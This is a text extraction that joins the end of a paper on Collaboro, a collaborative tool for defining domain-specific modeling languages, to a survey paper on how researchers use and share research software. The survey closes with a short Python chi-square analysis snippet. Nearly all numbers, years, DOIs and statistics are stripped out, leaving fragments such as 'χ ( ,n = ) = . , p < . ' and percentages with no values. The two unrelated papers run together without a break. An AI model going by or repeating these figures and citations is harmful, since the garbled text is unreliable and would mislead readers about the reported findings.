regarding the recommender engine and the calculation of metrics for dsmls, we can identify works centered on assessing the quality of both the abstract and concrete syntaxes, and the main features of the language (e.g., reusability, integrability or compatibility). there are several works providing metrics to check the quality of metamodels (cho & gray, ; aguilera, gómez & olivé, ) and of the notation used for textual dsmls (power & malloy, ; črepinšek et al., ).
with regard to graphical dsmls, moody's principles (moody, ) have emerged as the predominant theoretical paradigm. originally based on the cognitive dimensions framework (blackwell et al., ; green, ; green & petre, ), moody's principles address their theoretical and practical limitations. while these principles provide a framework to evaluate visual notations, other works have put them into practice by analyzing dsmls (genon, amyot & heymans, a; genon, heymans & amyot, b; moody & van hillegersberg, ; le pallec & dupuy-chessa, ) or have complemented the use of moody's principles with polls (figl et al., ), thus allowing end-user feedback and involvement during the design process of a visual notation. however, the previous works are usually centered on specific dsmls and do not provide mechanisms that can be applied to any dsml, as our approach does. other works, such as kahraman & bilgen ( ), propose an evaluation framework focused on language features and therefore do not particularly analyze the quality from an end-user perspective. to the best of our knowledge, ours is the first proposal to generically assess the cognitive quality of dsmls under development. finally, the representation of the collaboration rationale is related to the area of requirements negotiation, argumentation and justification approaches, such as the work presented by jureta, faulkner & schobbens ( ). the decision algorithms proposed in those works could be integrated into our decision engine. other decision engines such as caslo (padrón, dodero & lanchas, ) or hermes (karacapilidis & papadias, ) could also be used.

conclusions

we have presented collaboro, a dsml to enable the participation of all members of a community in the specification of a new domain-specific language or in the creation of new models. collaboro allows representing (and tracking) language change proposals, solutions and comments for both the abstract and concrete syntaxes of the language. this information can then be used to justify the design decisions taken during the definition or use of the modeling language. the approach provides two front-ends (i.e., eclipse-based and web-based ones) to facilitate its usage and also incorporates a recommender system which checks the quality of the dsml under development. once the community reaches an agreement on the language features, our collaboro model could later be used as input to language workbenches in order to automatically create the dsl tooling (i.e., editors, parsers, palettes, repositories, etc.) needed to start using the language in practice. for instance, it would be possible to automatically create the configuration files required for xtext (for textual languages) or gmf (for graphical ones) from our notation and abstract syntax models. as further work, we plan to extend our notation metamodel (and the renderer) to support richer concrete syntax definitions (e.g., incorporating the concept of anchor to specify how to represent the source/target connections for links in graphical languages). these extensions should be defined as pluggable extensions to allow designers to import them in the definition of languages where it is foreseen that those additional concepts may be needed. we also find it interesting to use our recommender system on existing (popular) languages as a way to assess the "quality" of such languages and, potentially, suggest changes to improve them.
furthermore, we would like to explore how to support the collaborative definition of the well-formed rules (e.g., ocl constraints) for the dsml under development. as these rules are normally expressed by using a (semi)formal textual language (like ocl), the challenge is how to discuss them in a way that non-technical experts can understand and participate. finally, we are also exploring how to better encourage end-user participation (e.g., by applying gamification techniques) to make sure the process is as plural as possible. this could be tried as part of a new experiment in an educational setting at our institution (universitat oberta de catalunya (uoc): www.uoc. edu) with the (virtual) students in our software engineering master degree. additional information and declarations funding javier luis cánovas izquierdo benefited from two postdoctoral fellowships grants by inria and in -uoc during the realization of this work. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: inria and in -uoc. competing interests the authors declare that they have no competing interests. author contributions � javier luis cánovas izquierdo conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � jordi cabot conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: github: https://github.com/som-research/collaboro. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://www.uoc.edu http://www.uoc.edu https://github.com/som-research/collaboro http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references aguilera d, gómez c, olivé a. . a method for the definition and treatment of conceptual schema quality issues. in: international conference on conceptual modeling. vol. . berlin, heidelberg: springer, – . altmanninger k, seidl m, wimmer m. . a survey on model versioning approaches. international journal of web information systems ( ): – doi . / . bariši�c a, amaral v, goulão m, barroca b. . evaluating the usability of domain-specific languages. in: formal and practical aspects of domain-specific languages: recent developments, – . available at http://www.igi-global.com/chapter/evaluating-usability-domain-specific- languages/ . blackwell af, britton c, cox al, green trg, gurr ca, kadoda gf, kutar m, loomes m, nehaniv cl, petre m, roast c, roe c, wong a, young rm. . cognitive dimensions of notations: design tools for cognitive technology. in: international conference on cognitive technology, coventry, – . brosch p, seidl m, wieland k, wimmer m, langer p. . we can work it out: collaborative conflict resolution in model versioning. in: european conference on computer supported cooperative work. london: springer, – . cabot j, wilson g. . tools for teams: a survey of web-based software project portals. available at http://www.drdobbs.com/tools/tools-for-teams-a-survey-of-web-based-so/ . cánovas izquierdo jl, cabot j. . enabling the collaborative definition of dsmls. 
in: international conference on advanced information systems engineering, valencia, – . cánovas izquierdo jl, cabot j. . enabling the definition and enforcement of governance rules in open source systems. in: international conference on software engineering. piscataway: ieee press, – . cánovas izquierdo jl, cabot j, lópez-fernández jj, sánchez cuadrado j, guerra e, de lara j. . engaging end-users in the collaborative development of domain-specific modelling languages. in: international conference on cooperative design, visualization, and engineering, alcudia, mallorca, – . cho h, gray j. . design patterns for metamodels. in: conference on systems, programming, and applications: software for humanity–colocated workshop. new york: acm, – . cho h, gray j, syriani e. . creating visual domain-specific modeling languages from end-user demonstration. in: international workshop on modeling in software engineering. piscataway: ieee press, – . črepinšek m, kosar t, mernik m, cervelle j, forax r, rousse g. . on automata and language based grammar metrics. computer science and information systems ( ): – doi . /csis c. dullemond k, van gameren b, van solingen r. . collaboration spaces for virtual software teams. ieee software ( ): – doi . /ms. . . figl k, derntl m, rodrı́guez mc, botturi l. . cognitive effectiveness of visual instructional design languages. journal of visual languages & computing ( ): – doi . /j.jvlc. . . . gabriel p, goulão m, amaral v. . do software languages engineers evaluate their languages? congreso iberoamericano en software engineering, cuenca, – . gallardo j, bravo c, redondo ma. . a model-driven development method for collaborative modeling tools. journal of network and computer applications ( ): – doi . /j.jnca. . . . cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://www.igi-global.com/chapter/evaluating-usability-domain-specific-languages/ http://www.igi-global.com/chapter/evaluating-usability-domain-specific-languages/ http://www.drdobbs.com/tools/tools-for-teams-a-survey-of-web-based-so/ http://dx.doi.org/ . /csis c http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /j.jvlc. . . http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gallardo j, bravo c, redondo ma, de lara j. . modeling collaboration protocols for collaborative modeling tools: experiences and applications. journal of visual languages & computing ( ): – doi . /j.jvlc. . . . genon n, amyot d, heymans p. a. analysing the cognitive effectiveness of the ucm visual notation. in: international workshop on system analysis and modeling, oslo, – . genon n, heymans p, amyot d. b. analysing the cognitive effectiveness of the bpmn . visual notation. in: international conference on software language engineering, eindhoven, – . green trg. . cognitive dimensions of notations. in: sutcliffe a, macaulay l, eds. people and computers. vol. . cambridge: cambridge university press, – . green trg, petre m. . usability analysis of visual programming environments: a cognitive dimensions framework. journal of visual languages & computing ( ): – doi . /jvlc. . . grundy jc, hosking j, li kn, ali nm, huh j, li rl. . generating domain-specific visual language tools from abstract visual specifications. ieee transactions on software engineering ( ): – doi . /tse. . . hatton l, van genuchten m. . early design decisions. ieee software ( ): – doi . /ms. . . hess j, offenberg s, pipek v. . community driven development as participation? 
involving user communities in a software design process. in: conference on participatory design. indianapolis: indiana university, – . hildenbrand t, rothlauf f, geisser m, heinzl a, kude t. . approaches to collaborative software development. in: conference on complex, intelligent and software intensive systems. piscataway: ieee, – . hussain z, slany w, holzinger a. . current state of agile user-centered design: a survey. in: symposium of the workgroup human-computer interaction and usability engineering of the austrian computer society–hci and usability for e-inclusion, linz. vol. . – . javed f, mernik m, gray j, bryant br. . mars: a metamodel recovery system using grammar inference. information and software technology ( – ): – doi . /j.infsof. . . . jureta ij, faulkner s, schobbens p-y. . clear justification of modeling decisions for goal-oriented requirements engineering. requirements engineering ( ): – doi . /s - - -y. kahraman g, bilgen s. . a framework for qualitative assessment of domain-specific languages. software & system modeling ( ): – doi . /s - - - . karacapilidis ni, papadias d. . computer supported argumentation and collaborative decision making: the hermes system. information systems ( ): – doi . /s - ( ) - . kelly s, pohjonen r. . worst practices for domain-specific modeling. ieee software ( ): – doi . /ms. . . kleppe a. . software language engineering: creating domain-specific languages using metamodels. boston: addison wesley. kuhrmann m. . user assistance during domain-specific language design. in: flexitools workshop, waikiki, honolulu. lanubile f, ebert c, prikladnicki r, vizcaı́no a. . collaboration tools for global software engineering. ieee software ( ): – doi . /ms. . . cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jvlc. . . http://dx.doi.org/ . /jvlc. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ le pallec x, dupuy-chessa s. . support for quality metrics in metamodelling. in: workshop on graphical modeling language development. new york: acm, – . leenheer pd. . on community-based ontology evolution. phd thesis, belgium: vrije universiteit brussel. available at https://d so lpcz yn .cloudfront.net/sites/vub/files/ a.pdf. liu q, gray j, mernik m, bryant br. . application of metamodel inference with large-scale metamodels. international journal of software and informatics ( ): – . lópez-fernández jj, sánchez cuadrado j, guerra e, de lara j. . example-driven meta-model development. software & systems modeling ( ): – doi . /s - - -y. mernik m, heering j, sloane am. . when and how to develop domain-specific languages. acm computing surveys ( ): – doi . / . miller ga. . the magical number seven, plus or minus two: some limits on our capacity for processing information. psychological review ( ): – doi . /h . moody dl. . the physics of notations: toward a scientific basis for constructing visual notations in software engineering. ieee transactions on software engineering ( ): – doi . /tse. . . moody dl, van hillegersberg j. . evaluating the visual syntax of uml: an analysis of the cognitive effectiveness of the uml family of diagrams. in: conference on software language engineering, toulouse, – . mylopoulos j, chung l, yu esk. . 
from object-oriented to goal-oriented requirements analysis. communications of the acm ( ): – doi . / . . norman da, draper sw. . user centered system design: new perspectives on human- computer interaction. hillsdale: l. erlbaum associates inc. object management group (omg). a. model-driven architecture (mda) specification. available at http://www.omg.org/mda/specs.htm (accessed may ). object management group (omg). b. object constraint language (ocl) specification. version . . available at http://www.omg.org/spec/ocl (accessed may ). object management group (omg). a. diagram definition (dd) specification. version . . available at http://www.omg.org/spec/dd (accessed may ). object management group (omg). b. meta object facility core (mof) specification. version . . available at http://www.omg.org/spec/mof/ . (accessed may ). padrón cl, dodero jm, lanchas j. . caslo: collaborative annotation service for learning objects. learning technology newsletter ( ): – . power jf, malloy ba. . a metrics suite for grammar-based software. journal of software maintenance and evolution: research and practice ( ): – doi . /smr. . prinz a, scheidgen m, tveit ms. . a model-based standard for sdl. in: international sdl forum, paris, – . rittgen p. . coma: a tool for collaborative modeling. in: forum at the international conference on advanced information systems engineering, montpellier, – . rooksby j, ikeya n. . collaboration in formative design: working together. ieee software ( ): – doi . /ms. . . sánchez cuadrado j, de lara j, guerra e. . bottom-up meta-modelling: an interactive approach. in: conference on model driven engineering languages and systems, innsbruck, – . sánchez cuadrado j, garcı́a molina j. . building domain-specific languages for model-driven development. ieee software ( ): – . cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / https://d so lpcz yn .cloudfront.net/sites/vub/files/ a.pdf https://d so lpcz yn .cloudfront.net/sites/vub/files/ a.pdf http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / http://dx.doi.org/ . /h http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / . http://www.omg.org/mda/specs.htm http://www.omg.org/spec/ocl http://www.omg.org/spec/dd http://www.omg.org/spec/mof/ . http://dx.doi.org/ . /smr. http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ scheidgen m. . textual modelling embedded into graphical modelling. in: european conference on model driven architecture–foundations and applications, berlin. vol. , – . siorpaes k. . lightweight community-driven ontology evolution. in: international semantic web conference, busan. vol. , – . steinberg d, budinsky f, paternostro m, merks e. . emf: eclipse modeling framework. boston: addison wesley. svg. . scalable vector graphics . . available at http://www.w .org/tr/svg/. tamburri da, lago p, vliet hv. . organizational social structures for software engineering. acm computing surveys ( ): – doi . / . . troyer od, leune cj. . wsdm: a user centered design method for web sites. computer networks ( – ): – . völter m. . md�/dsl best practices. available at http://voelter.de/data/pub/dslbestpractices- update.pdf (accessed may ). whitehead j. . collaboration in software engineering: a roadmap. in: workshop on the future of software engineering. piscataway: ieee computer society, – . cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://www.w .org/tr/svg/ http://dx.doi.org/ . / . 
towards computational reproducibility: researcher perspectives on the use and sharing of software

a peer-reviewed version of this preprint was published in peerj. view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint: alnoamany y, borghi ja. towards computational reproducibility: researcher perspectives on the use and sharing of software. peerj computer science, doi . /peerj-cs.

yasmin alnoamany and john a. borghi
university of california, berkeley; california digital library
corresponding author: yasmin alnoamany, email address: yasminal@berkeley.edu

abstract

research software, which includes both the source code and executables used as part of the research process, presents a significant challenge for efforts aimed at ensuring reproducibility. in order to inform such efforts, we conducted a survey to better understand the characteristics of research software as well as how it is created, used, and shared by researchers.
based on the responses of participants, representing a range of research disciplines, we found that researchers create, use, and share software in a wide variety of forms for a wide variety of purposes, including data collection, data analysis, data visualization, data cleaning and organization, and automation. more participants indicated that they use open source software than commercial software. while a relatively small number of programming languages (e.g. python, r, javascript, c++, matlab) are used by a large number, there is a long tail of languages used by relatively few. between group comparisons revealed that significantly more participants from computer science write source code and create executables than participants from other disciplines. group comparisons related to knowledge of best practices related to software creation or sharing were not significant. while many participants indicated that they draw a distinction between the sharing and preservation of software, related practices and perceptions were often not aligned with those of the broader scholarly communications community.

introduction

research software is an important consideration when addressing concerns related to reproducibility (hong ( ); hong ( ); stodden et al. ( ); goble ( )). effective management and sharing of software saves time, increases transparency, and advances science (prlić and procter ( )). at present, there are several converging efforts to ensure that software is positioned as a "first class" research object that is maintained, assessed, and cited in a similar fashion as scholarly publications (e.g. nih ( ); katz et al. ( ); ram et al. ( ); crouch et al. ( )). however, while there is a burgeoning literature exploring the activities of researchers in relation to materials like data (tenopir et al. ( ); tenopir et al. ( ); monteith et al. ( ); kim and stanton ( )), those related to software have received less attention. specifically, we have been unable to find a study that thoroughly examines how researchers use, share, and value their software. in this paper we report the results of a survey designed to capture researcher practices and perceptions related to software. survey questions addressed a variety of topics including:

1. what are the characteristics of research software?
2. how do researchers use software?
3. to what extent do current practices related to software align with those related to reproducibility?
4. how do researchers share software?
5. how do researchers preserve software?

after filtering, researchers participated in our survey. overall, our results demonstrate that researchers create software using a wide variety of programming languages, use software for a wide variety of purposes, have adopted some, but not all, practices recommended to address reproducibility, often share software outside of traditional scholarly communication channels, and generally do not actively preserve their software. participants from computer science reported that they write source code and create executables significantly more than participants from other disciplines. however, other group comparisons largely did not reach statistical significance. in the following sections, we provide a more detailed description of our findings. we start with an overview of the related literature (section ), then a description of our survey instrument and the demographic characteristics of our participants (section ; section ).
in section , we describe our findings related to the characteristics of research software and its usage. responses to questions involving reproducibility-related practices are detailed in section . section outlines the responses to questions related to software sharing and preservation. we discuss the implications of our findings in section . finally, section contains a discussion of future work. related work while there is an emerging body of research examining researcher practices, perceptions, and priorities for products like data (fecher et al. ( ); kratz and strasser ( ); tenopir et al. ( ); tenopir et al. ( )), work related to software has generally focused on how it is found, adopted, and credited (howison and bullard ( b); hucka and graham ( ); joppa et al. ( )). for example, research examining the re-use of software demonstrates that the most common difficulty for users looking for software is a lack of documentation and that finding software is a difficult task even within technology companies (sadowski et al. ( )). however, as software is increasingly central to the research process (borgman et al. ( )), understanding its characteristics, its use, and the related practices and perceptions of researchers is an essential component of addressing reproducibility. the term “reproducibility” has been applied to a variety of efforts aimed at addressing the misalignment between good research practices, including those emphasizing transparency and methodological rigor, and the academic reward system, which generally emphasizes the publication of novel and positive results (nosek et al. ( ); munafò et al. ( )). attempts to provide a cohesive lexicon for describing reproducibility-related activities are described elsewhere (goodman et al. ( )) but computational reproducibility generally refers to the description and sharing of software tools and data in such a manner as to enable their use and evaluation by others (stodden et al. ( )). efforts aimed at fostering computational reproducibility are often focused on the sharing of source code but may also include the establishment of best practice guidelines related to how software tools are described, cited, and licensed (e.g. stodden et al. ( )). because of the costs of irreproducibility, there have been numerous calls urging researchers to more thoroughly describe and share their software (barnes ( ); ince et al. ( ); joppa et al. ( ); morin et al. ( a)). such calls are increasingly backed by mandates from funding agencies. for example, the wellcome trust now expects that grant recipients make available “any original software that is required to view datasets or to replicate analyses” (wellcome ( )). in parallel, a myriad of guidelines, tools, and organizations have emerged to help researchers address issues related to their software. software-related best practices have been outlined for both individuals working in specific research disciplines (eglen et al. ( ); marwick ( )) and for the research community in general (e.g. piccolo and frampton ( ); sandve et al. ( ); jimenez et al. ( )). literate programming tools such as jupyter notebooks (perez and granger ( )) allow researchers to combine data, code, comments, and outputs (e.g., figures and tables) in a human-readable fashion, while packaging and containerization platforms such as reprozip (chirigati et al. ( )) and docker (boettiger ( )) enable the tracking, bundling, and sharing of all of the software libraries and dependencies associated with a research project. 
through their integration with github (https://github.com/), services like figshare (https://figshare.com/) and zenodo (https://zenodo.org/) allow researchers to deposit, archive, and receive persistent identifiers for their software. training researchers to better develop, use, and maintain software tools is the primary focus of community organizations including the carpentries (wilson ( ); teal et al. ( )) and the software sustainability institute (crouch / et al. ( )) while scholarly communications-focused organizations such as force have published guidelines for describing and citing software (smith et al. ( )). as is evident in the above description, reproducibility-related efforts involving software often, but not always, overlap with those related to data. however, software presents a number of unique challenges compared to data and other research products. even defining the bounds of the term “software” is challenging. for example, the national institute of standards and technology (nist) defines software as “computer programs and associated data that may be dynamically written or modified during execution.” (kissel et al. ( )), a definition that is as recursive as it is potentially confusing for researchers without a background in computer science or software development. software involves highly interdependent source and binary components that are sensitive to changes in operating environment and are difficult to track (thain et al. ( )). evaluating the validity and reliability of software often requires inspecting source code, which is not possible when proprietary licenses are applied (morin et al. ( b); stodden ( )). even when source code is technically available, important information about versions, parameters, and runtime environments is often missing from the scholarly record (howison and bullard ( b); pan et al. ( ); stodden et al. ( )). seemingly small alterations, even for well described and openly available software tools, can lead to significant effects on analytical outputs (mccarthy et al. ( )), a problem exacerbated by the fact that researchers often have minimal formal training in software development practices (hannay et al. ( ); joppa et al. ( ); prabhu et al. ( )). the iterative and collaborative nature of software development also means that it does not fit easily within existing academic incentive structures (hafer and kirkpatrick ( ); howison and herbsleb ( ); howison and herbsleb ( )). research software is a growing concern for research service providers, including those affiliated with academic institutions. often through workshops facilitated by the carpentries, many have begun to provide guidance and training to researchers looking to create and use software tools. services related to the preservation of software have also been explored by some academic libraries (e.g. rios ( )). however, these activities remain relatively nascent and it is presently unclear what a mature set of services related to research software and computational reproducibility might look like. by identifying the characteristics or research software, its uses, and elucidating the related practices and perceptions of researchers, we hope to establish a benchmark that can be applied to inform the development of such services in the future. methods in order to understand researcher practices and perceptions related to software and computational repro- ducibility, we designed and disseminated an online survey via the qualtrics platform (www.qualtrics. com). 
the survey was advertised through blog posts, social media, and research-related email lists and listservs. because the survey was distributed using different communication channels, we could not calculate the response rate. in section , we detail the demographics of the survey’s participants. all study materials and procedures were approved by the university of california berkeley committee for protection of human subjects and office for the protection of human subjects (protocol id - - ). the full text of the survey can be found in the supplementary materials. before beginning the survey, participants were required to read and give their informed consent to participate. after reading the informed consent form (see survey), participants indicated their consent by checking a box. information from participants who did not check this box was removed from all subsequent analyses. an anonymized version of our survey results (alnoamany and borghi ( a)) as well as the code we used for its analysis (alnoamany and borghi ( b)) are also available on github (https://github.com/yasmina /swcuration). . survey design the survey was developed to capture a broad range of information about how researchers use, share, and value their software. the final survey instrument consisted of questions ( multiple choices, open response), divided into four sections. in order, the sections focused on: . demographics: included questions related the participant’s research discipline, role, degree, age, institution, and funding sources ( questions) . characteristics of research software: included questions related to how the participants use software and the characteristics of their software ( questions). / . software sharing practices: included questions related to how participants make their software available to others ( questions). . how researchers assign value to software ( questions). because only sections and addressed topics related to computational reproducibility, this paper is focused on responses to questions in the first three questions. future work will further delineate how researchers value software. we hypothesized that study participants would come to our survey with different levels of knowledge about software development practices and terminology. therefore, we included a brief list of definitions in our survey for terms like “source code”, “executable”, and “open source software” that participants could refer back to at any time. participants were not required to answer every question in order to proceed through the survey. . filtering and exclusion criteria we collected responses to an online survey of software usage and sharing practices and perceptions from late january to early april of . we excluded participants who started the survey but did not answer questions beyond the demographic section to have unique responses. though the majority of our participants indicated that they were from academia (table ), we did not exclude any participant due to institution type because of the possibility that participants could be affiliated with an academic or research program while conducting work in another sector. institution names and disciplines were canonicalized (e.g. ucb and uc berkeley were mapped to uc berkeley). table . demographic breakdown for study participants. discipline count percentage institution count percentage computer science . % academic: research focused . % biology . % academic: teaching focused . % psychology . % government . % engineering . % nonprofit . 
% interdisciplinary programs . % academic: medical school . % mathematics . % commercial . % physics . % other . % earth science . % role count percentage library sciences . % graduate student . % social sciences . % postdoc . % others . % research faculty . % highest degree count percentage staff . % doctorate . % principal investigator . % masters . % research assistant . % bachelors . % undergraduate student . % high school . % research . % professional degree . % other . % participant demographics we asked participants about their age, professional degrees, professional title (or role) and institutional affiliation, institution type, and the sources of funding. the majority of these questions were multiple choice with an option for open response upon selecting “other”. the mean and median age of our participants were . and years old, respectively. reflecting the ubiquity of software within the research enterprise, participants were drawn from a wide variety of research disciplines, institution types, and roles. as shown in table , the disciplines most represented in our sample were computer science, biology, and psychology. the majority of our participants were drawn from different research-focused academic institutions (including % out of researchers from uc berkeley). table also shows that participants had a range of degrees and roles, with the most common being doctorate ( . %, n = ) and graduate student ( . %, n = ), respectively. in terms of funding, the most common responses were the national science foundation (nsf) ( . %, n = ) and the national institutes of health ( . %, n = ). / characteristics and use of research software before diving deeper into how researchers use their software, we wanted to identify its characteristics. in this section, we describe responses to questions related to the creation and use of source code and executables. . source code and executables we asked participants about the generation and use of source code and executables (i.e. do you write source code?, do you use source code written by others?, do you create executables?, do you use executables created by others?). we found that . % out of responding participants write source code and . % out of use source code written by others while . % out of create executables and . % use executables written by others. figure shows that participants from computer science were significantly more likely to write source code [χ ( ,n = ) = . , p < . ], create executables [χ ( ,n = ) = . , p < . ], and use executables created by others [χ ( ,n = ) = . , p < . ] than participants from other disciplines. comparisons related to the use of others’ source code did not reach statistical significance [χ ( ,n = ) = . , p = . ]. we also asked participants about the type of software they use (i.e. do you use commercial software in the course of your research? do you use open source software in the course of your research?). as shown in figure more participants indicated that they use open source software ( . %, n = ) than commercial software ( . %, n = ). . programming languages in order to quantify the breadth of programming languages used in a research setting, we asked participants about the languages they use when writing their own code. table shows the top ten languages, which together account for . % of languages selected. the top used languages in our sample were python, r, javascript, c++, matlab, java, c, php, and perl. python and r were the most used languages, selected by . % and . 
% of participants, respectively. for the most part, these results are in line with previous findings from hucka and graham (hucka and graham ( )) and also match those of a recent study from stack overflow (inc. ( )). in total, different languages were chosen, with the most common responses outside of the top ten being ruby, c#, asp, sas, xml, xquery, and julia. quantitatively measuring the use of programming languages in academic research is difficult due to the variability of reporting practices (howison and bullard ( a)), but our results are largely in line with the rapid ascent of r and python as tools for data science. table . the top programming languages used by the researchers in our sample. a total of participants answered this question. together these languages represent . % of the languages selected. note that participants could choose more than one language. language: python, r, sql, javascript, c++, matlab, java, c, php, perl. selection percentage: . %, . %, . %, . %, . %, . %, . %, . %, . %, . %. we also inquired about collaborative code development and the extent to which the same programming languages are used within a lab or a research group. though . % of participants indicated that they write code collaboratively, we were surprised to see that only . % indicated that everyone in the lab used the same language(s). . use of research software previous scholarship (e.g. borgman et al. ( )) has indicated that researchers use software for a wide variety of purposes. to examine the purposes of research software, we asked participants about how they use their code or software (figure ). this question allowed them to choose multiple answers from a suggested list or input other answers. figure (a) shows that our participants use software primarily to analyze data, visualize data, clean and organize data, automate their work, and collect data. a total of participants ( . % out of participants) responded that they use software for all five. “other” responses included running simulations, building models, researching algorithms, testing methods, writing compilers, and sharing and publishing data. figure . significantly more participants from computer science stated that they write source code, create executables, and use executables created by others than participants from other disciplines (panels: (a) do you write source code? (b) do you use source code written by others? (c) do you create executables? (d) do you use executables created by others?). figure . the use of open source software versus commercial software. n = . figure . the purpose of using research software (panels: (a) how do you use code or software? (b) have you ever repurposed your code or software?); note that the first question could be answered with more than one choice. we also asked if researchers repurpose their code (i.e. using it for a project other than the one for which it was originally created) and found that % out of participants indicated that they do that. we investigated how researchers collaborate on code writing within their research labs (figure ) (e.g. “do you write code collaboratively (i.e.
with another person or multiple people)?”, “does everyone in your lab or research group write code using the same programming language(s)?”). we found that . % (n = ) of researchers write code collaboratively (figure (a)), while only % (n = ) use the same coding language in their research labs (figure (b)). previous studies on the reuse of research software have focused mainly on licensing, review of code, and user awareness (joppa et al. ( ); morin et al. ( a)). reinforcing the need to establish best practices (or good enough practices, e.g. wilson et al. ( )) akin to those related to the management of research data, . % of our participants (n = ) indicated that they repurpose their code. in an open response question, we asked participants to describe, in their own words, how they use their software and code. here, again, participants indicated that they use software for a wide variety of purposes. one participant summed up the relationship between software and their research succinctly as “i use software for stimulus presentation, data acquisition, and data analysis and visualization - basically my entire research is run via computers (and thus code).” similarly, another participant described the application of software within the field of computer science: “as a computer scientist, almost every aspect of my research from grant proposal to collecting data to analyzing data to writing up my results involves software. i write software. i use software my collaborators or students write as well as open source and commercial software.” reproducibility-related practices to understand how the practices of our participants align with those related to computational reproducibility, we asked a number of questions about adding comments to source code, generating documentation, communicating information about dependencies, and using “notebook” applications such as jupyter. we also asked about awareness of coding conventions and best practices. the results of these questions are shown in figure . in line with previous research (hannay et al. ( ); joppa et al. ( ); prabhu et al. ( )), only . % (n = ) of our participants indicated that they have received formal training in coding conventions or best practices. at the same time, we found that many actually employ practices that are commonly cited for establishing computational reproducibility. for example, when asked “do you include comments in your code?” and “when you share your code or software, do you provide information about dependencies?” the majority of participants ( . %, n = , and . %, n = ) indicated that they include comments and provide information about dependencies, respectively. figure . consistency of programming languages within research groups (panels: (a) does everyone in your lab or research group write code using the same programming language(s)? (b) do you write code collaboratively?). figure . reproducibility practices in research (panels: (a) have you received training in coding conventions or best practices? (b) do you include comments in your code? (c) do you generate documentation for your code? (d) do you write code using a notebook?). figure . cs researchers tend to provide information about dependencies more than other disciplines (panels: (a) when you share your code or software, do you share it alongside related files (e.g. datasets)? (b) when you share your code or software, do you provide information about dependencies?). however, substantially
fewer indicated that they employ other practices such as generating documentation ( . %, n = ). while electronic lab notebooks have been cited as a tool for ensuring reproducibility (kluyver et al. ( )), only . % (n = ) of our participants indicated that they use them to write code. comparisons of responses by discipline (e.g. computer science versus others) or location (e.g. uc berkeley versus others) were insignificant even, surprisingly, on questions related to training [discipline: χ ( , n = ) = . , p = . ; location: χ ( , n = ) = . , p = . ] (figure ). the lone exception was in providing information about dependencies: significantly more respondents from computer science reported that they include information about dependencies when they share their code than participants from other disciplines [χ ( , n = ) = . , p < . ]. sharing and preservation of the research software making materials available for others to evaluate, use, and build upon is an essential component of ensuring reproducibility. much of the previous work examining the sharing of research software has focused on the degree to which software is cited and described irregularly in the scholarly literature (howison and bullard ( a); smith et al. ( )) and on the relationship between code sharing and research impact (vandewalle ( )). in order to gain a greater understanding of how sharing practices relate to reproducibility, we asked our participants a variety of questions about how they share, find, and preserve software. . sharing research software sharing practices while only half ( . %, n = ) of our participants indicated that they were aware of related community standards in their field or discipline, the majority indicated that they share software as part of the research process (computer science: . %, other disciplines: . %, for n = ) (figure ). of participants, % indicated that there were reasons their software could not be shared (figure (b)). the most commonly cited restrictions on sharing were the inclusion of sensitive data, intellectual property concerns, and the time needed to prepare code for sharing. comparisons between computer science and other disciplines on the sharing of code were not statistically significant [χ ( , n = ) = . , p > . ]. we also checked if participants share new versions of their code and found that % (n = ) do so using a version control system. a group comparison related to the sharing of new versions was not statistically significant [cs vs non-cs: χ ( , n = ) = . , p > . ] (figure (c)); however, significantly more participants from computer science indicated that they share their code via a version control system than those from other disciplines [χ ( , n = ) = . , p < . ] (figure (d)). figure . practices of code sharing (panels: (a) do you share the code or software created as part of your research? (b) is there any reason your code or software could not be shared? (c) if you make a change to your code, do you share a new version? (d) do you use a version control system (e.g. git, svn)?).
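the group comparisons reported above are standard chi-square tests of independence between a cs / non-cs indicator and a yes/no survey response. the sketch below shows, under stated assumptions, how such a comparison can be computed with pandas and scipy; the file name and column names (survey_responses.csv, discipline, shares_code) are illustrative placeholders, not the actual field names of the released data set or the authors' analysis code.

```python
# minimal sketch of a chi-square group comparison like those reported above.
# the csv path and column names are hypothetical placeholders.
import pandas as pd
from scipy.stats import chi2_contingency

responses = pd.read_csv("survey_responses.csv")  # hypothetical file name

# collapse discipline into a cs vs non-cs indicator
responses["group"] = responses["discipline"].apply(
    lambda d: "cs" if d == "computer science" else "non-cs"
)

# cross-tabulate the group against one yes/no/don't-know question
table = pd.crosstab(responses["group"], responses["shares_code"])

# chi-square test of independence on the contingency table
chi2, p, dof, expected = chi2_contingency(table)
print(f"chi2({dof}, n = {table.values.sum()}) = {chi2:.2f}, p = {p:.3f}")
```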
